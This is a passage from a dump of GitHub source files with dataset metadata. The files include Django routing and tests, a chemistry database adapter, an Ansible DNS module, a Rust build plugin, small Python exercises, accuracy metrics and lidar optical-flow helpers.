break\nprint(dict_ex9)\n","repo_name":"tdisbm/pythonexpress","sub_path":"exercises/dict_exercises.py","file_name":"dict_exercises.py","file_ext":"py","file_size_in_byte":3688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40801778710","text":"\"\"\"Unit tests for view_model.py\"\"\"\nimport pytest\nfrom todo_app.view_model import ViewModel\nfrom todo_app.item import Item\n\ndef test_todo_items():\n items = [\n Item(1, \"Test_ToDo1\", \"To Do\"),\n ]\n todo_items_list = ViewModel(items).todo_items\n assert len(todo_items_list) > 0, \"No ToDo item found\"\n\ndef test_doing_items():\n items = [\n Item(1, \"Test_Doing1\", \"Doing\"),\n ]\n doing_items_list = ViewModel(items).doing_items\n assert len(doing_items_list) > 0, \"No Doing item found\"\n\ndef test_done_items():\n items = [\n Item(1, \"Test_Done1\", \"Done\"),\n ]\n done_items_list = ViewModel(items).done_items\n assert len(done_items_list) > 0, \"No Done item found\"\n","repo_name":"jainsushma/DevOps-Course-Starter","sub_path":"tests/test_view_model.py","file_name":"test_view_model.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22253854837","text":"from django.conf.urls import url\n\nfrom . import views\n\napp_name = 'django_sms'\n\nurlpatterns = [\n url(\n r'^plivo/?$',\n views.PlivoWebhookView.as_view(),\n name='plivo'\n ),\n url(\n r'^twilio/?$',\n views.TwilioWebhookView.as_view(),\n name='twilio'\n ),\n]\n","repo_name":"ssprasad100/AWS-lunchbreak","sub_path":"lunchbreak/django_sms/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"52300366","text":"\"\"\"invoice_creator URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import include, path\n\nurlpatterns = [\n path('invoice_manager/', include('invoice_manager.urls'), name='invoice_manager'),\n path('customer_manager/', include('customer_manager.urls'), name='customer_manager'),\n path('customer_pricing_manager/', include('customer_pricing_manager.urls'), name='customer_pricing_manager'),\n path('item_manager/', include('item_manager.urls'), name='item_manager'),\n path('company_manager/', include('company_manager.urls'), name='company_manager'),\n path('', include('home.urls'), name='home'),\n path('admin/', admin.site.urls),\n]","repo_name":"inventabuild/Customer-invoice","sub_path":"invoice_creator/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18296983202","text":"from os import listdir, remove, rmdir\nfrom os.path import join\n\nfrom indigo import IndigoObject\nfrom indigo.bingo import Bingo, BingoException\n\nfrom ..constants import DB_BINGO\nfrom ..helpers import indigo_iterator\nfrom ..logger import logger\nfrom .base import NoSQLAdapter, catch_indigo_exception\n\n\nclass BingoNoSQL(NoSQLAdapter):\n dbms = DB_BINGO\n\n def __init__(self, indigo):\n NoSQLAdapter.__init__(self)\n self.indigo = indigo\n\n def connect(self):\n logger.info(f\"Connecting to {self.dbms} DB\")\n self.bingo = Bingo.loadDatabaseFile(self.indigo, self.db_path)\n\n def close_connect(self):\n logger.info(f\"Closing connecting to {self.dbms} DB\")\n self.bingo.close()\n\n def import_data(self, data_path: str, database_type: str):\n logger.info(f\"Creating {self.dbms} database\")\n self.bingo = Bingo.createDatabaseFile(\n self.indigo, self.db_path, database_type\n )\n\n logger.info(f\"Importing data to {self.dbms} from {data_path}\")\n index = 1\n for mol in indigo_iterator(self.indigo, data_path):\n try:\n self.bingo.insert(mol, index)\n except BingoException as e:\n logger.error(\n f\"Error during import {database_type} from \"\n f\"{data_path} (id = {index}) \"\n f\"'{mol.rawData()[:20]}...': {e}\"\n )\n finally:\n index += 1\n self.close_connect()\n\n def delete_base(self):\n logger.info(f\"Dropping {self.dbms} database\")\n for db_file in listdir(join(self.db_dir, self.db_name)):\n remove(join(self.db_dir, self.db_name, db_file))\n rmdir(join(self.db_dir, self.db_name))\n\n @catch_indigo_exception()\n def mass(self, molecule: IndigoObject, weight_type: str):\n if weight_type == \"molecular-weight\":\n return molecule.molecularWeight()\n if weight_type == \"most-abundant-mass\":\n return molecule.mostAbundantMass()\n if weight_type == \"monoisotopic-mass\":\n return molecule.monoisotopicMass()\n\n @catch_indigo_exception()\n def gross(self, molecule: IndigoObject):\n return molecule.grossFormula()\n\n @catch_indigo_exception(catch_error=True)\n def exact(self, molecule, target_function=None, options=\"\"):\n result = []\n exact_matcher = self.bingo.searchExact(molecule, options)\n while exact_matcher.next():\n id = exact_matcher.getCurrentId()\n result.append(id)\n exact_matcher.close()\n return result\n\n @catch_indigo_exception(catch_error=True)\n def substructure(self, molecule, target_function=None, options=\"\"):\n result = []\n query = self.indigo.loadQueryMolecule(molecule.rawData())\n sub_matcher = self.bingo.searchSub(query, options)\n while sub_matcher.next():\n id = sub_matcher.getCurrentId()\n result.append(id)\n sub_matcher.close()\n return result\n\n @catch_indigo_exception(catch_error=True)\n def similarity(self, molecule, target_function=None, options=\"\"):\n result = []\n sim_type, min_sim, max_sim = options.split(\", \")\n min_sim, max_sim = float(min_sim), float(max_sim)\n sim_matcher = self.bingo.searchSim(\n molecule, min_sim, max_sim, sim_type\n )\n while sim_matcher.next():\n id = sim_matcher.getCurrentId()\n result.append(id)\n sim_matcher.close()\n return result\n\n @catch_indigo_exception(catch_error=True)\n def smarts(self, molecule, target_function=None, options=\"\"):\n return self.substructure(molecule, target_function, options)\n\n @catch_indigo_exception(catch_error=True)\n def rsmarts(self, reaction, target_function=None, options=\"\"):\n return self.substructure(reaction, target_function, options)\n\n @catch_indigo_exception(catch_error=True)\n def rexact(self, reaction, target_function=None, options=\"\"):\n result = []\n exact_matcher = self.bingo.searchExact(reaction, options)\n while exact_matcher.next():\n id = exact_matcher.getCurrentId()\n result.append(id)\n exact_matcher.close()\n return result\n\n @catch_indigo_exception(catch_error=True)\n def rsubstructure(self, reaction, target_function=None, options=\"\"):\n result = []\n query = self.indigo.loadQueryReaction(reaction.rawData())\n sub_matcher = self.bingo.searchSub(query, options)\n while sub_matcher.next():\n id = sub_matcher.getCurrentId()\n result.append(id)\n sub_matcher.close()\n return result\n","repo_name":"epam/Indigo","sub_path":"bingo/tests/dbc/BingoNoSQL.py","file_name":"BingoNoSQL.py","file_ext":"py","file_size_in_byte":4684,"program_lang":"python","lang":"en","doc_type":"code","stars":257,"dataset":"github-code","pt":"53"} +{"seq_id":"4469100031","text":"import os, glob\nimport subprocess\n\nfolder = '/media/D/Datasets/TRMM'\nfolder = '/home/cak/Desktop/Datasets/TRMM'\n\nfiles = glob.glob1(folder, '*.nc4')\n\nos.chdir(folder)\n\n\n\n\nfor file in files:\n name = file[0:8]\n # udo cdo settaxis,2020-01-01,12:00:00,1day 3B42RT_Daily.20191231.7.nc4 set.nc\n\n date = name[0:4] + '-' + name[4:6] + '-' + name[6:8]\n\n code = 'cdo settaxis,{},12:00:00,1day {file} time_{file}'.format(date, file=file)\n os.system(code)\n","repo_name":"lucabrocca78/Jupyter-lumped-models","sub_path":"Data_prep/TRMM_merge.py","file_name":"TRMM_merge.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33833290714","text":"from __future__ import annotations\n\nfrom contextlib import suppress\nfrom typing import NoReturn\n\nfrom ..module_utils.basic import default_arg_spec\nfrom ..module_utils.basic import default_required_if\nfrom ..module_utils.basic import init_module\nfrom ..module_utils.basic import init_sdk\nfrom ..module_utils.basic import log_grpc_error\n\nwith suppress(ImportError):\n from google.protobuf.json_format import MessageToDict\n from yandex.cloud.dns.v1.dns_zone_service_pb2 import CreateDnsZoneRequest\n from yandex.cloud.dns.v1.dns_zone_service_pb2 import DeleteDnsZoneRequest\n from yandex.cloud.dns.v1.dns_zone_service_pb2 import GetDnsZoneRequest\n from yandex.cloud.dns.v1.dns_zone_service_pb2 import ListDnsZonesRequest\n from yandex.cloud.dns.v1.dns_zone_service_pb2 import UpdateDnsZoneRequest\n from yandex.cloud.dns.v1.dns_zone_service_pb2_grpc import DnsZoneServiceStub\n\n\ndef main() -> NoReturn:\n argument_spec = default_arg_spec()\n argument_spec.update(\n {\n 'folder_id': {'type': 'str'},\n 'dns_zone_id': {'type': 'str'},\n 'name': {'type': 'str'},\n 'description': {'type': 'str'},\n 'zone': {'type': 'str', 'required': True},\n 'labels': {'type': 'dict'},\n 'visibility': {\n 'type': 'dict',\n 'options': {\n 'network_ids': {\n 'type': 'list',\n 'elements': 'str',\n 'required': True,\n },\n },\n },\n 'state': {\n 'type': 'str',\n 'default': 'present',\n 'choices': ['present', 'absent'],\n },\n },\n )\n required_if = default_required_if()\n required_one_of = [\n ('dns_zone_id', 'name', 'folder_id'),\n ]\n required_by = {\n 'name': 'folder_id',\n }\n module = init_module(\n argument_spec=argument_spec,\n required_one_of=required_one_of,\n required_by=required_by,\n required_if=required_if,\n supports_check_mode=True,\n )\n client: DnsZoneServiceStub = init_sdk(module).client(DnsZoneServiceStub)\n result = {}\n\n state = module.params['state']\n dns_zone_id = module.params['dns_zone_id']\n folder_id = module.params['folder_id']\n name = module.params['name']\n zone = module.params['zone']\n kw = {\n 'name': name,\n 'description': module.params['description'],\n 'labels': module.params['labels'],\n }\n if module.params['visibility']:\n kw['private_visibility'] = module.params['visibility']\n else:\n kw['public_visibility'] = {}\n\n # check if the dns exists\n curr_dns = None\n with log_grpc_error(module):\n if dns_zone_id:\n curr_dns = client.Get(GetDnsZoneRequest(dns_zone_id=dns_zone_id))\n else:\n zones = client.List(ListDnsZonesRequest(folder_id=folder_id, filter=f'name=\"{name}\"')).dns_zones\n if zones:\n curr_dns = zones[0]\n\n with log_grpc_error(module):\n if state == 'present':\n if curr_dns:\n kw['dns_zone_id'] = dns_zone_id\n resp = client.Update(UpdateDnsZoneRequest(**kw))\n result.update(MessageToDict(resp))\n else:\n kw['folder_id'] = folder_id\n kw['zone'] = zone\n resp = client.Create(CreateDnsZoneRequest(**kw))\n result.update(MessageToDict(resp))\n\n elif state == 'absent':\n if not curr_dns:\n module.fail_json(f'dns zone {dns_zone_id or name} not found')\n resp = client.Delete(DeleteDnsZoneRequest(dns_zone_id=curr_dns.id))\n result.update(MessageToDict(resp))\n\n module.exit_json(**result, changed=True)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"q0w/yandex.cloud","sub_path":"plugins/modules/dns.py","file_name":"dns.py","file_ext":"py","file_size_in_byte":3867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25893782672","text":"# -*- coding:utf-8 -*-\n\nimport numpy as np\n\n\"\"\" 数组中有一个数字出现的次数超过数组长度的一半,请找出这个数字。\n 例如输入一个长度为9的数组[1,2,3,2,2,2,5,4,2]。\n 由于数字2在数组中出现了5次,超过数组长度的一半,因此输出2。如果不存在则输出0。\"\"\"\n\n\"\"\" 思路 用字典保存各元素出现的次数即可\"\"\"\n\n\ndef find_the_num(li):\n\n info = {}\n length = len(li)\n if not length:\n return 0\n for i in range(length):\n if li[i] in info.keys():\n info[li[i]] += 1\n else:\n info[li[i]] = 1\n\n for k, v in info.items():\n if v > length / 2:\n return k\n\n\nif __name__ == '__main__':\n\n a = np.array([1,2,3,2,2,2,5,4,2])\n result = find_the_num(a)\n print(result)","repo_name":"qtvspa/offer","sub_path":"Array/repeat_over_half.py","file_name":"repeat_over_half.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70479221288","text":"#!/usr/bin/python3\n\"\"\"\nTakes in a URL, sends a request to the URL and displays the value of\nthe X-Request-Id variable found in the header of the response\n\"\"\"\n\nimport requests\nimport sys\n\nif __name__ == \"__main__\":\n response = requests.get(sys.argv[1])\n header = response.headers\n if \"X-Request-Id\" in header:\n print(header['X-Request-Id'])\n","repo_name":"cmmolanos1/holbertonschool-higher_level_programming","sub_path":"0x11-python-network_1/5-hbtn_header.py","file_name":"5-hbtn_header.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5238515396","text":"\"\"\"\nEXERCÍCIO 086: Matriz em Python\n\nCrie um programa que crie uma matriz de dimensão 3x3 e preencha com valores lidos pelo teclado.\n0 [_][_][_]\n1 [_][_][_]\n2 [_][_][_]\n 0 1 2\n\nNo final, mostre a matriz na tela, com a formatação correta.\n\"\"\"\n\nmatriz = [[],[],[]]\nfor linha in range(0,3):\n for coluna in range(0,3):\n numero = int(input(f'Digite um valor para a posição ({linha}, {coluna}): '))\n matriz[linha].append(numero)\n\n\nprint(matriz[0])\nprint(matriz[1])\nprint(matriz[2])\n","repo_name":"bruno-gs/Python","sub_path":"Curso em video/Estruturas Compostas - M3/LISTAS/ex086.py","file_name":"ex086.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35066136537","text":"# Author: Omkar Dixit\n# Email: omedxt@gmail.com\n\n'''\nRotate Matrix: Given an image represented by an NxN matrix, where each pixel in the image is 4\nbytes, write a method to rotate the image by 90 degrees. Can you do this in place?\n'''\n\n# Time Complexity O(n^2)\n\nimport sys\n\ndef rotateMatrix(matrix):\n for i in range(len(matrix)):\n for j in range(i, len(matrix)):\n matrix[i][j], matrix[j][i] = matrix[j][i], matrix[i][j]\n for i in range(len(matrix)):\n matrix[i].reverse()\n return matrix\n\n\nif __name__==\"__main__\":\n # matrix = [\n # [1, -2, -6],\n # [0, 3, 7],\n # [1, -2, 5]\n # ]\n matrix = [\n [1, 2, 3],\n [4, 5, 6],\n [7, 8, 9]\n ]\n # print(\"Rotating {}\".format(matrix))\n # print(\"Done\")\n print(rotateMatrix(matrix))","repo_name":"dixitomkar1809/Coding-Python","sub_path":"CtCi/Array&Strings/rotateMatrix.py","file_name":"rotateMatrix.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27269857495","text":"# 2.1\nfrom typing import List\nimport numpy as np\nfrom scipy.integrate import odeint\nimport matplotlib.pyplot as plt\n\n# 2.2\nRESOLUTION = 100\n\ndef model(y: np.ndarray, t:float) -> List:\n return [t**2]\n\n# 2.3\nt = np.linspace(0, 10, RESOLUTION)\n\nres_n = odeint(model, [0], t)\n\n# 2.4\nres_a = t**3/3\n\nplt.plot(t, res_n, linewidth=5, alpha=0.5)\nplt.plot(t, res_a)\nplt.title(\"comparison of numerical and analytical solution\")\nplt.legend(['numeric', 'analytical'])\nplt.xlabel(\"t\")\nplt.show()\nplt.close()","repo_name":"cozajeden/Podstawy_Sterowania_Optymalnego","sub_path":"lab8_2.py","file_name":"lab8_2.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2566559865","text":"from subprocess import run\nfrom .Base import plugin, BasePlugin, PluginSupport\n\n\n@plugin\nclass RustPlugin(BasePlugin):\n def build(self, settings):\n \"\"\"compiles the source code or a subset thereof\"\"\"\n return run(\n [\"cargo\", \"build\", *settings[\"cmdline_build\"].value],\n cwd=settings[\"repo_base\"].value,\n ).returncode\n\n def test(self, settings):\n \"\"\"runs automated tests on source code or a subset there of\"\"\"\n return run(\n [\"cargo\", \"test\", *settings[\"cmdline_test\"].value],\n cwd=settings[\"repo_base\"].value,\n ).returncode\n\n def clean(self, settings):\n \"\"\"cleans source code or a subset there of\"\"\"\n return run([\"cargo\", \"clean\"], cwd=settings[\"repo_base\"].value).returncode\n\n def install(self, settings):\n \"\"\"compiles the source code or a subset thereof\"\"\"\n return run(\n [\"cargo\", \"install\", \"--path\", \".\", *settings[\"cmdline_install\"].value],\n cwd=settings[\"repo_base\"].value,\n ).returncode\n\n def run(self, settings):\n \"\"\"runs the binary\"\"\"\n return run(\n [\"cargo\", \"run\", *settings[\"cmdline_run\"].value],\n cwd=settings[\"repo_base\"].value,\n ).returncode\n\n def format(self, settings):\n \"\"\"runs the binary\"\"\"\n return run(\n [\"cargo\", \"fmt\", *settings[\"cmdline_format\"].value],\n cwd=settings[\"repo_base\"].value,\n ).returncode\n\n def tidy(self, settings):\n \"\"\"runs the binary\"\"\"\n return run(\n [\"cargo\", \"check\", *settings[\"cmdline_tidy\"].value],\n cwd=settings[\"repo_base\"].value,\n ).returncode\n\n def bench(self, settings):\n \"\"\"runs the binary\"\"\"\n return run(\n [\"cargo\", \"bench\", *settings[\"cmdline_bench\"].value],\n cwd=settings[\"repo_base\"].value,\n ).returncode\n\n def generate(self, settings):\n return run(\n [\"cargo\", \"init\", *settings[\"cmdline_generate\"].value],\n cwd=settings[\"repo_base\"].value,\n ).returncode\n\n @staticmethod\n def _supported(settings):\n \"\"\"returns a dictionary of supported functions\"\"\"\n if (\n \"repo_base\" in settings\n and (settings[\"repo_base\"].value / \"Cargo.toml\").exists()\n ):\n state = PluginSupport.DEFAULT_MAIN\n install_state = PluginSupport.NOT_ENABLED_BY_DEFAULT\n else:\n state = PluginSupport.NOT_ENABLED_BY_REPOSITORY\n install_state = PluginSupport.NOT_ENABLED_BY_REPOSITORY\n\n return {\n \"build\": state,\n \"test\": state,\n \"clean\": state,\n \"install\": install_state,\n \"run\": state,\n \"format\": state,\n \"tidy\": state,\n \"bench\": state,\n \"generate\": PluginSupport.NOT_ENABLED_BY_DEFAULT,\n }\n","repo_name":"robertu94/m","sub_path":"m/plugins/Rust.py","file_name":"Rust.py","file_ext":"py","file_size_in_byte":2895,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"22624122540","text":"import numpy as np\nimport torch\nfrom sklearn.metrics import normalized_mutual_info_score as NmiMetric\nfrom sklearn.metrics import matthews_corrcoef as MccMetric\nimport os, json\nimport numpy as np\n\n\ndef shot_acc(preds, labels, train_data, many_shot_thr=100, low_shot_thr=20, acc_per_cls=False):\n \n if isinstance(train_data, np.ndarray):\n training_labels = np.array(train_data).astype(int)\n else:\n training_labels = np.array(train_data.dataset.labels).astype(int)\n\n if isinstance(preds, torch.Tensor):\n preds = preds.detach().cpu().numpy()\n labels = labels.detach().cpu().numpy()\n elif isinstance(preds, np.ndarray):\n pass\n else:\n raise TypeError('Type ({}) of preds not supported'.format(type(preds)))\n train_class_count = []\n test_class_count = []\n class_correct = []\n for l in np.unique(labels):\n train_class_count.append(len(training_labels[training_labels == l]))\n test_class_count.append(len(labels[labels == l]))\n class_correct.append((preds[labels == l] == labels[labels == l]).sum())\n\n many_shot = []\n median_shot = []\n low_shot = []\n for i in range(len(train_class_count)):\n if train_class_count[i] > many_shot_thr:\n many_shot.append((class_correct[i] / test_class_count[i]))\n elif train_class_count[i] < low_shot_thr:\n low_shot.append((class_correct[i] / test_class_count[i]))\n else:\n median_shot.append((class_correct[i] / test_class_count[i])) \n \n if len(many_shot) == 0:\n many_shot.append(0)\n if len(median_shot) == 0:\n median_shot.append(0)\n if len(low_shot) == 0:\n low_shot.append(0)\n\n if acc_per_cls:\n class_accs = [c / cnt for c, cnt in zip(class_correct, test_class_count)] \n return np.mean(many_shot), np.mean(median_shot), np.mean(low_shot), class_accs\n else:\n return np.mean(many_shot), np.mean(median_shot), np.mean(low_shot)\n\ndef weighted_shot_acc (preds, labels, ws, train_data, many_shot_thr=100, low_shot_thr=20):\n \n training_labels = np.array(train_data.dataset.labels).astype(int)\n\n if isinstance(preds, torch.Tensor):\n preds = preds.detach().cpu().numpy()\n labels = labels.detach().cpu().numpy()\n elif isinstance(preds, np.ndarray):\n pass\n else:\n raise TypeError('Type ({}) of preds not supported'.format(type(preds)))\n train_class_count = []\n test_class_count = []\n class_correct = []\n for l in np.unique(labels):\n train_class_count.append(len(training_labels[training_labels == l]))\n test_class_count.append(ws[labels==l].sum())\n class_correct.append(((preds[labels==l] == labels[labels==l]) * ws[labels==l]).sum())\n\n many_shot = []\n median_shot = []\n low_shot = []\n for i in range(len(train_class_count)):\n if train_class_count[i] > many_shot_thr:\n many_shot.append((class_correct[i] / test_class_count[i]))\n elif train_class_count[i] < low_shot_thr:\n low_shot.append((class_correct[i] / test_class_count[i]))\n else:\n median_shot.append((class_correct[i] / test_class_count[i])) \n return np.mean(many_shot), np.mean(median_shot), np.mean(low_shot)\n\n\n\ndef mcc_mni_metrics(preds, labels):\n return MccMetric(labels, preds), NmiMetric(labels, preds)\n\n\n\n\n\ndef class_count (data):\n labels = np.array(data.dataset.labels)\n class_data_num = []\n for l in np.unique(labels):\n class_data_num.append(len(labels[labels == l]))\n return class_data_num\n\n\nclass SummaryMeter(object):\n def __init__(self, summary_interval, data_type):\n self.summary_interval = summary_interval\n self.values = None\n self.index = 0\n self.data_type = data_type\n assert data_type in [\"scalar\", \"hist\"]\n \n def add(self, d, writer):\n if self.values is None:\n self.values = {k:[v] for k,v in d.items()}\n size = 1\n else:\n size = None\n for k,v in d.items():\n self.values[k].append(v)\n size = len(self.values[k])\n \n if size >= self.summary_interval:\n for k,v in self.values.items():\n if self.data_type == \"scalar\":\n writer.add_scalar(\n k, np.mean(v), self.index)\n elif self.data_type == \"hist\":\n writer.add_histogram(\n k, v[-1], self.index)\n\n self.values = None\n self.index += 1\n","repo_name":"silicx/DLSA","sub_path":"utils/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":4553,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"8228219012","text":"import numpy as np\r\nimport cv2\r\nimport math\r\nimport pyflow\r\nimport time\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom Lidar_tools import polar_to_cartesian, find_lidar_theta_phi_from_coord_Ma\r\n\r\n\r\n\r\ndef test_show_lidar_line(image_now_cut, points, focus):\r\n for point in points:\r\n camera_coord_x1 = point[0]\r\n camera_coord_y1 = point[1]\r\n camera_coord_z1 = point[2]\r\n camera_coord_x2 = point[3]\r\n camera_coord_y2 = point[4]\r\n camera_coord_z2 = point[5]\r\n\r\n x1 = 1099 / 2 - camera_coord_x1 * focus / camera_coord_z1\r\n # result_y[y, x] =599 / 2 - camera_coord_y * focus / camera_coord_z\r\n y1 = 299 / 2 - camera_coord_y1 * focus / camera_coord_z1\r\n\r\n x2 = 1099 / 2 - camera_coord_x2 * focus / camera_coord_z2\r\n # result_y[y, x] =599 / 2 - camera_coord_y * focus / camera_coord_z\r\n y2 = 299 / 2 - camera_coord_y2 * focus / camera_coord_z2\r\n\r\n cv2.line(image_now_cut, (int(x1), int(y1)), (int(x2), int(y2)), (0, 0, 250), 4)\r\n\r\n return image_now_cut\r\n\r\n\r\ndef lidar_result_fusion(image, marker, marker_ground_ref):\r\n marker_tracked = marker['marker_tracked']\r\n marker_candidate = marker['marker_candidate']\r\n marker_candidate2 = marker['marker_candidate2']\r\n marker_s_tracked = marker['marker_s_tracked']\r\n marker_s_candidate = marker['marker_s_candidate']\r\n marker_s_candidate2 = marker['marker_s_candidate2']\r\n\r\n def set_color(image_c, marker, value):\r\n image_c[marker[:, 1], marker[:, 0]] = value\r\n image_c[marker[:, 1] + 1, marker[:, 0]] = value\r\n image_c[marker[:, 1] - 1, marker[:, 0]] = value\r\n image_c[marker[:, 1], marker[:, 0] + 1] = value\r\n image_c[marker[:, 1], marker[:, 0] - 1] = value\r\n return image_c\r\n\r\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\r\n\r\n rounded_marker_ground = np.round(marker_ground_ref).astype(dtype=int)\r\n if rounded_marker_ground.size != 0:\r\n image[..., 0] = set_color(image[..., 0], rounded_marker_ground, 0)\r\n image[..., 1] = set_color(image[..., 1], rounded_marker_ground, 0)\r\n image[..., 2] = set_color(image[..., 2], rounded_marker_ground, 0)\r\n\r\n rounded_marker_tracked = np.round(marker_tracked).astype(dtype=int)\r\n rounded_marker_candidate = np.round(marker_candidate).astype(dtype=int)\r\n rounded_marker_candidate2 = np.round(marker_candidate2).astype(dtype=int)\r\n if rounded_marker_tracked.size != 0:\r\n image[..., 0] = set_color(image[..., 0], rounded_marker_tracked, 0)\r\n image[..., 1] = set_color(image[..., 1], rounded_marker_tracked, 0)\r\n image[..., 2] = set_color(image[..., 2], rounded_marker_tracked, 255)\r\n\r\n if rounded_marker_candidate.size != 0:\r\n image[..., 0] = set_color(image[..., 0], rounded_marker_candidate, 0)\r\n image[..., 1] = set_color(image[..., 1], rounded_marker_candidate, 255)\r\n image[..., 2] = set_color(image[..., 2], rounded_marker_candidate, 255)\r\n\r\n if rounded_marker_candidate2.size != 0:\r\n image[..., 0] = set_color(image[..., 0], rounded_marker_candidate2, 0)\r\n image[..., 1] = set_color(image[..., 1], rounded_marker_candidate2, 150)\r\n image[..., 2] = set_color(image[..., 2], rounded_marker_candidate2, 255)\r\n\r\n rounded_marker_s_tracked = np.round(marker_s_tracked).astype(dtype=int)\r\n rounded_marker_s_candidate = np.round(marker_s_candidate).astype(dtype=int)\r\n rounded_marker_s_candidate2 = np.round(marker_s_candidate2).astype(dtype=int)\r\n if rounded_marker_s_tracked.size != 0:\r\n image[..., 0] = set_color(image[..., 0], rounded_marker_s_tracked, 255)\r\n image[..., 1] = set_color(image[..., 1], rounded_marker_s_tracked, 0)\r\n image[..., 2] = set_color(image[..., 2], rounded_marker_s_tracked, 0)\r\n\r\n if rounded_marker_s_candidate.size != 0:\r\n image[..., 0] = set_color(image[..., 0], rounded_marker_s_candidate, 255)\r\n image[..., 1] = set_color(image[..., 1], rounded_marker_s_candidate, 200)\r\n image[..., 2] = set_color(image[..., 2], rounded_marker_s_candidate, 100)\r\n\r\n if rounded_marker_s_candidate2.size != 0:\r\n image[..., 0] = set_color(image[..., 0], rounded_marker_s_candidate2, 0)\r\n image[..., 1] = set_color(image[..., 1], rounded_marker_s_candidate2, 255)\r\n image[..., 2] = set_color(image[..., 2], rounded_marker_s_candidate2, 0)\r\n\r\n\r\n #image_monitor = np.concatenate((image_monitor_b, image_monitor_g, image_monitor_r), axis=2)\r\n #image_monitor = cv2.add(image_monitor, cv2.cvtColor(image_now_cut, cv2.COLOR_GRAY2RGB))\r\n\r\n return image\r\n\r\n\r\ndef opt_flow(image_1, image_2, Mode='all'):\r\n image_shape = list(image_1.shape)\r\n image_shape.append(3)\r\n hsv_shape = tuple(image_shape)\r\n hsv_0 = np.zeros(hsv_shape)\r\n hsv_0[..., 1] = 255\r\n\r\n gamma = 3\r\n #image_1 = cv2.GaussianBlur(image_1, (5, 5), 0.5)\r\n #image_2 = cv2.GaussianBlur(image_2, (5, 5), 0.5)\r\n flow = cv2.calcOpticalFlowFarneback(image_1, image_2, None, 0.5, 5, # pyr_scale, levels\r\n 20, 5, 5, 1.2, 0)\r\n # winsize, iterations, poly_n, poly_sigma, flags\r\n\r\n magnitude, angle = cv2.cartToPolar(-flow[..., 0], -flow[..., 1], angleInDegrees=True)\r\n\r\n if Mode == 'all':\r\n hsv = hsv_0\r\n hsv[..., 0] = angle / 2\r\n hsv[..., 2] = cv2.normalize(magnitude, None, 0, 1, cv2.NORM_MINMAX)\r\n hsv[..., 2] = 255 * hsv[..., 2] ** (1 / gamma)\r\n hsv = np.uint8(hsv)\r\n image_flow = cv2.cvtColor(hsv, cv2.COLOR_HSV2RGB)\r\n\r\n return magnitude, angle, image_flow\r\n elif Mode == 'normal':\r\n return magnitude, angle\r\n\r\n # if cv2.waitKey(5) & 0xFF == ord('q'):\r\n # cv2.destroyAllWindows()\r\n # break\r\n\r\n\r\ndef opt_flow2(image1, image2):\r\n image1 = image1.astype(float) / 255.\r\n image2 = image2.astype(float) / 255.\r\n\r\n image1 = np.expand_dims(image1, axis=2)\r\n image2 = np.expand_dims(image2, axis=2)\r\n\r\n # for full res\r\n #alpha = 0.012\r\n #ratio = 0.5\r\n #minWidth = 10\r\n #nOuterFPIterations = 2\r\n #nInnerFPIterations = 2\r\n #nSORIterations = 3\r\n\r\n alpha = 0.015\r\n ratio = 0.5\r\n minWidth = 10\r\n nOuterFPIterations = 2\r\n nInnerFPIterations = 2\r\n nSORIterations = 3\r\n\r\n\r\n colType = 1 # 0 or default:RGB, 1:GRAY (but pass gray image with shape (h,w,1))\r\n\r\n s = time.time()\r\n u, v, im2W = pyflow.coarse2fine_flow(\r\n image1, image2, alpha, ratio, minWidth, nOuterFPIterations, nInnerFPIterations,\r\n nSORIterations, colType)\r\n e = time.time()\r\n print('Time Taken: %.2f seconds for image of size (%d, %d, %d)' % (\r\n e - s, image1.shape[0], image1.shape[1], image1.shape[2]))\r\n flow = np.concatenate((-u[..., None], -v[..., None]), axis=2) # reversed direction, from image 2 flow to image 1\r\n\r\n gamma = 3\r\n hsv = np.zeros([image1.shape[0], image1.shape[1], 3])\r\n hsv[:, :, 0] = 255\r\n hsv[:, :, 1] = 255\r\n mag, ang = cv2.cartToPolar(flow[..., 0], flow[..., 1])\r\n\r\n hsv[..., 0] = ang * 180 / np.pi / 2\r\n hsv[..., 2] = cv2.normalize(mag, None, 0, 1, cv2.NORM_MINMAX)\r\n hsv[..., 2] = 255 * 